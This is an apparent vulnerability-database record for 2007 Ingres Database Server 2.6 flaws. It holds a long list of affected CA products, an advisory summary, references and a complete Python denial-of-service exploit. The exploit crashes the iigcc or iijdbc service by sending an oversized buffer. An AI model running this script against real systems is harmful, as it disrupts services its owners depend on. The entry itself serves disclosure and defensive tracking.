Details of VAR-E-200706-0107

ID

VAR-E-200706-0107

CVE

cve_id:	CVE-2007-3334	Trust: 2.4
cve_id:	CVE-2007-3338	Trust: 0.8
cve_id:	CVE-2007-3337	Trust: 0.8
cve_id:	CVE-2007-3336	Trust: 0.8

sources: BID: 24585 // PACKETSTORM: 92818 // EXPLOIT-DB: 30224 // EDBNET: 51927

EDB ID

30224

TITLE

Ingress Database Server 2.6 - Multiple Remote Vulnerabilities - Windows dos Exploit

Trust: 0.6

sources: EXPLOIT-DB: 30224

DESCRIPTION

Ingress Database Server 2.6 - Multiple Remote Vulnerabilities. CVE-2007-3334CVE-37487 . dos exploit for Windows platform

Trust: 0.6

sources: EXPLOIT-DB: 30224

AFFECTED PRODUCTS

vendor:	ingress	model:	database server	scope:	eq	version:	2.6	Trust: 1.6
vendor:	computer	model:	associates advantage ingres	scope:	eq	version:	2.6	Trust: 0.5
vendor:	ingres	model:	database	scope:	eq	version:	20060	Trust: 0.3
vendor:	ingres	model:	database	scope:	eq	version:	3.0.3	Trust: 0.3
vendor:	ingres	model:	database	scope:	eq	version:	2.6	Trust: 0.3
vendor:	ingres	model:	database	scope:	eq	version:	2.5	Trust: 0.3
vendor:	computer	model:	associates wily soa manager	scope:	eq	version:	7.1	Trust: 0.3
vendor:	computer	model:	associates unicenter workload control center 1.0.sp4	scope:	-	version:	-	Trust: 0.3
vendor:	computer	model:	associates unicenter workload control center sp4	scope:	eq	version:	1.0	Trust: 0.3
vendor:	computer	model:	associates unicenter tng	scope:	eq	version:	2.4.2	Trust: 0.3
vendor:	computer	model:	associates unicenter tng	scope:	eq	version:	2.2	Trust: 0.3
vendor:	computer	model:	associates unicenter tng 2.4.2j	scope:	-	version:	-	Trust: 0.3
vendor:	computer	model:	associates unicenter software delivery	scope:	eq	version:	11	Trust: 0.3
vendor:	computer	model:	associates unicenter serviceplus service desk	scope:	eq	version:	6.0	Trust: 0.3
vendor:	computer	model:	associates unicenter serviceplus service desk sp1	scope:	eq	version:	6.0	Trust: 0.3
vendor:	computer	model:	associates unicenter serviceplus service desk sp3	scope:	eq	version:	5.5	Trust: 0.3
vendor:	computer	model:	associates unicenter serviceplus service desk	scope:	eq	version:	11.2	Trust: 0.3
vendor:	computer	model:	associates unicenter serviceplus service desk	scope:	eq	version:	11.1	Trust: 0.3
vendor:	computer	model:	associates unicenter serviceplus service desk	scope:	eq	version:	11	Trust: 0.3
vendor:	computer	model:	associates unicenter service metric analysis	scope:	eq	version:	3.5	Trust: 0.3
vendor:	computer	model:	associates unicenter service metric analysis	scope:	eq	version:	3.0.2	Trust: 0.3
vendor:	computer	model:	associates unicenter service metric analysis	scope:	eq	version:	11.1	Trust: 0.3
vendor:	computer	model:	associates unicenter service metric analysis	scope:	eq	version:	11	Trust: 0.3
vendor:	computer	model:	associates unicenter service intelligence	scope:	eq	version:	11	Trust: 0.3
vendor:	computer	model:	associates unicenter service delivery	scope:	eq	version:	11.0	Trust: 0.3
vendor:	computer	model:	associates unicenter service delivery	scope:	eq	version:	11.1	Trust: 0.3
vendor:	computer	model:	associates unicenter service catalog	scope:	eq	version:	11	Trust: 0.3
vendor:	computer	model:	associates unicenter service assure	scope:	eq	version:	2.2	Trust: 0.3
vendor:	computer	model:	associates unicenter service assure	scope:	eq	version:	11.1	Trust: 0.3
vendor:	computer	model:	associates unicenter service assure	scope:	eq	version:	11	Trust: 0.3
vendor:	computer	model:	associates unicenter remote control	scope:	eq	version:	6.0	Trust: 0.3
vendor:	computer	model:	associates unicenter remote control	scope:	eq	version:	11	Trust: 0.3
vendor:	computer	model:	associates unicenter patch management	scope:	eq	version:	11	Trust: 0.3
vendor:	computer	model:	associates unicenter network and systems management	scope:	eq	version:	3.1	Trust: 0.3
vendor:	computer	model:	associates unicenter network and systems management	scope:	eq	version:	3.0	Trust: 0.3
vendor:	computer	model:	associates unicenter network and systems management	scope:	eq	version:	11	Trust: 0.3
vendor:	computer	model:	associates unicenter management portal	scope:	eq	version:	3.1.1	Trust: 0.3
vendor:	computer	model:	associates unicenter lightweight portal	scope:	eq	version:	2	Trust: 0.3
vendor:	computer	model:	associates unicenter job management option	scope:	eq	version:	11.0	Trust: 0.3
vendor:	computer	model:	associates unicenter enterprise job manager sp4	scope:	eq	version:	1.0	Trust: 0.3
vendor:	computer	model:	associates unicenter enterprise job manager sp3	scope:	eq	version:	1.0	Trust: 0.3
vendor:	computer	model:	associates unicenter desktop management suite	scope:	eq	version:	11	Trust: 0.3
vendor:	computer	model:	associates unicenter desktop and server management	scope:	eq	version:	11	Trust: 0.3
vendor:	computer	model:	associates unicenter database command center	scope:	eq	version:	11.1	Trust: 0.3
vendor:	computer	model:	associates unicenter ca web services distributed management	scope:	eq	version:	3.5	Trust: 0.3
vendor:	computer	model:	associates unicenter ca web services distributed management	scope:	eq	version:	3.11	Trust: 0.3
vendor:	computer	model:	associates unicenter asset portfolio management	scope:	eq	version:	11.2.1	Trust: 0.3
vendor:	computer	model:	associates unicenter asset portfolio management	scope:	eq	version:	11.0	Trust: 0.3
vendor:	computer	model:	associates unicenter asset portfolio management	scope:	eq	version:	11.3	Trust: 0.3
vendor:	computer	model:	associates unicenter asset management	scope:	eq	version:	11	Trust: 0.3
vendor:	computer	model:	associates unicenter asset intelligence	scope:	eq	version:	11	Trust: 0.3
vendor:	computer	model:	associates unicenter advanced systems management	scope:	eq	version:	11	Trust: 0.3
vendor:	computer	model:	associates etrust web access control	scope:	eq	version:	1.0	Trust: 0.3
vendor:	computer	model:	associates etrust single sign-on	scope:	eq	version:	8.1	Trust: 0.3
vendor:	computer	model:	associates etrust single sign-on	scope:	eq	version:	8	Trust: 0.3
vendor:	computer	model:	associates etrust single sign-on	scope:	eq	version:	7	Trust: 0.3
vendor:	computer	model:	associates etrust secure content manager	scope:	eq	version:	8.0	Trust: 0.3
vendor:	computer	model:	associates etrust network forensics	scope:	eq	version:	8.1	Trust: 0.3
vendor:	computer	model:	associates etrust identity manager	scope:	eq	version:	8.1	Trust: 0.3
vendor:	computer	model:	associates etrust iam toolkit	scope:	eq	version:	8.1	Trust: 0.3
vendor:	computer	model:	associates etrust iam toolkit	scope:	eq	version:	8	Trust: 0.3
vendor:	computer	model:	associates etrust iam suite	scope:	eq	version:	8	Trust: 0.3
vendor:	computer	model:	associates etrust directory	scope:	eq	version:	8.1	Trust: 0.3
vendor:	computer	model:	associates etrust audit r8	scope:	-	version:	-	Trust: 0.3
vendor:	computer	model:	associates etrust admin	scope:	eq	version:	8.1	Trust: 0.3
vendor:	computer	model:	associates etrust admin	scope:	eq	version:	8.0	Trust: 0.3
vendor:	computer	model:	associates etrust admin sp2	scope:	eq	version:	8.1	Trust: 0.3
vendor:	computer	model:	associates etrust admin sp1	scope:	eq	version:	8.1	Trust: 0.3
vendor:	computer	model:	associates docserver	scope:	eq	version:	1.1	Trust: 0.3
vendor:	computer	model:	associates cleverpath predictive analysis server	scope:	eq	version:	3.0	Trust: 0.3
vendor:	computer	model:	associates cleverpath aion bre	scope:	eq	version:	10.1	Trust: 0.3
vendor:	computer	model:	associates cleverpath aion bpm	scope:	eq	version:	10.1	Trust: 0.3
vendor:	computer	model:	associates ccs	scope:	eq	version:	11	Trust: 0.3
vendor:	computer	model:	associates brightstor storage resource manager	scope:	eq	version:	11.5	Trust: 0.3
vendor:	computer	model:	associates brightstor storage command center	scope:	eq	version:	11.5	Trust: 0.3
vendor:	computer	model:	associates brightstor enterprise backup for tru64	scope:	eq	version:	10.5	Trust: 0.3
vendor:	computer	model:	associates brightstor enterprise backup for solaris	scope:	eq	version:	10.5	Trust: 0.3
vendor:	computer	model:	associates brightstor enterprise backup for hp	scope:	eq	version:	10.5	Trust: 0.3
vendor:	computer	model:	associates brightstor enterprise backup for aix	scope:	eq	version:	10.5	Trust: 0.3
vendor:	computer	model:	associates brightstor arcserve backup for linux	scope:	eq	version:	11.1	Trust: 0.3
vendor:	computer	model:	associates brightstor arcserve backup for linux	scope:	eq	version:	9.0	Trust: 0.3
vendor:	computer	model:	associates brightstor arcserve backup	scope:	eq	version:	11.1	Trust: 0.3
vendor:	computer	model:	associates brightstor arcserve backup	scope:	eq	version:	11.5	Trust: 0.3
vendor:	computer	model:	associates arcserve backup for laptops and desktops	scope:	eq	version:	11.5	Trust: 0.3
vendor:	computer	model:	associates allfusion harvest change manager	scope:	eq	version:	7.1	Trust: 0.3
vendor:	computer	model:	associates allfusion harvest change manager	scope:	eq	version:	7	Trust: 0.3
vendor:	computer	model:	associates allfusion enterprise workbench	scope:	eq	version:	7.1	Trust: 0.3
vendor:	computer	model:	associates allfusion enterprise workbench	scope:	eq	version:	7	Trust: 0.3
vendor:	computer	model:	associates allfusion enterprise workbench sp1	scope:	eq	version:	1.1	Trust: 0.3
vendor:	computer	model:	associates allfusion enterprise workbench	scope:	eq	version:	1.1	Trust: 0.3
vendor:	computer	model:	associates advantage data transformer	scope:	eq	version:	2.2	Trust: 0.3

sources: BID: 24585 // PACKETSTORM: 92818 // EXPLOIT-DB: 30224 // EDBNET: 51927

EXPLOIT

source: https://www.securityfocus.com/bid/24585/info

Ingress Database Server included in CA eTrust Secure Content Manager is prone to multiple remote vulnerabilities, including multiple stack- and heap-based buffer-overflow issues, multiple pointer-overwrite issues, and an arbitrary-file-overwrite issue.

Successful exploits will allow attackers to completely compromise affected computers, including executing arbitrary code with SYSTEM-level privileges and truncating the 'alarkp.def' file.

# Exploit Title: Computer Associates Advantage Ingres 2.6 Denial of Service Vulnerabilities
# Date: 2010-08-14
# Author: fdisk
# Version: 2.6
# Tested on: Windows 2003 Server SP1 en
# CVE: CVE-2007-3334 - CVE-2007-3336 - CVE-2007-3337 - CVE-2007-3338
# Notes: Fixed in the last version.
# please let me know if you are/were able to get code execution <rr dot fdisk at gmail dot com>

import socket
import sys

if len(sys.argv) != 4:
print "Usage: ./CAAdvantageDoS.py <Target IP> <Port> <Service>"
print "Vulnerable Services: iigcc, iijdbc"
sys.exit(1)

host = sys.argv[1]
port = int(sys.argv[2])
service = sys.argv[3]

if service == "iigcc":
payload = "\x41" * 2106
elif service == "iijdbc":
payload = "\x41" * 1066
else:
print "Vulnerable Services: iigcc, iijdbc"
sys.exit(1)

payload += "\x42" * 4

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print "Sending payload"
s.send(payload)
data = s.recv(1024)
s.close()
print 'Received', repr(data)

print service + " crashed"

Trust: 1.0

sources: EXPLOIT-DB: 30224

EXPLOIT LANGUAGE

Trust: 0.6

sources: EXPLOIT-DB: 30224

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 30224

TYPE

Multiple Remote Vulnerabilities

Trust: 1.6

sources: EXPLOIT-DB: 30224 // EDBNET: 51927

CREDITS

anonymous

Trust: 0.6

sources: EXPLOIT-DB: 30224

EXTERNAL IDS

db:	NVD	id:	CVE-2007-3334	Trust: 2.4
db:	EXPLOIT-DB	id:	30224	Trust: 1.9
db:	BID	id:	24585	Trust: 1.9
db:	NVD	id:	CVE-2007-3338	Trust: 0.8
db:	NVD	id:	CVE-2007-3337	Trust: 0.8
db:	NVD	id:	CVE-2007-3336	Trust: 0.8
db:	EDBNET	id:	51927	Trust: 0.6
db:	PACKETSTORM	id:	92818	Trust: 0.5

sources: BID: 24585 // PACKETSTORM: 92818 // EXPLOIT-DB: 30224 // EDBNET: 51927

REFERENCES

url:	https://nvd.nist.gov/vuln/detail/cve-2007-3334	Trust: 2.1
url:	https://www.securityfocus.com/bid/24585/info	Trust: 1.0
url:	https://www.exploit-db.com/exploits/30224/	Trust: 0.6
url:	https://nvd.nist.gov/vuln/detail/cve-2007-3336	Trust: 0.5
url:	https://nvd.nist.gov/vuln/detail/cve-2007-3338	Trust: 0.5
url:	https://nvd.nist.gov/vuln/detail/cve-2007-3337	Trust: 0.5
url:	http://www.ngssoftware.com/advisories/critical-risk-vulnerability-in-ingres-pointer-overwrite-2/	Trust: 0.3
url:	http://supportconnectw.ca.com/public/ca_common_docs/ingresvuln_letter.asp	Trust: 0.3
url:	http://www.ingres.com/	Trust: 0.3
url:	https://www.exploit-db.com/exploits/30224	Trust: 0.3
url:	http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=546	Trust: 0.3
url:	http://www.ca.com/us/securityadvisor/newsinfo/collateral.aspx?cid=145778	Trust: 0.3

sources: BID: 24585 // PACKETSTORM: 92818 // EXPLOIT-DB: 30224 // EDBNET: 51927

SOURCES

db:	BID	id:	24585
db:	PACKETSTORM	id:	92818
db:	EXPLOIT-DB	id:	30224
db:	EDBNET	id:	51927

LAST UPDATE DATE

2022-07-27T09:48:33.447000+00:00

SOURCES UPDATE DATE

db:

BID

id:

24585

date:

2015-03-19T08:36:00

SOURCES RELEASE DATE

db:	BID	id:	24585	date:	2007-06-21T00:00:00
db:	PACKETSTORM	id:	92818	date:	2010-08-17T01:35:50
db:	EXPLOIT-DB	id:	30224	date:	2007-06-21T00:00:00
db:	EDBNET	id:	51927	date:	2007-06-21T00:00:00

tag:	exploit	Trust: 0.5
tag:	denial of service	Trust: 0.5
tag:	vulnerability	Trust: 0.5

ID

CVE

EDB ID

TITLE

DESCRIPTION

AFFECTED PRODUCTS

EXPLOIT

EXPLOIT LANGUAGE

PRICE

TYPE

TAGS

CREDITS

EXTERNAL IDS

REFERENCES

SOURCES

LAST UPDATE DATE

SOURCES UPDATE DATE

SOURCES RELEASE DATE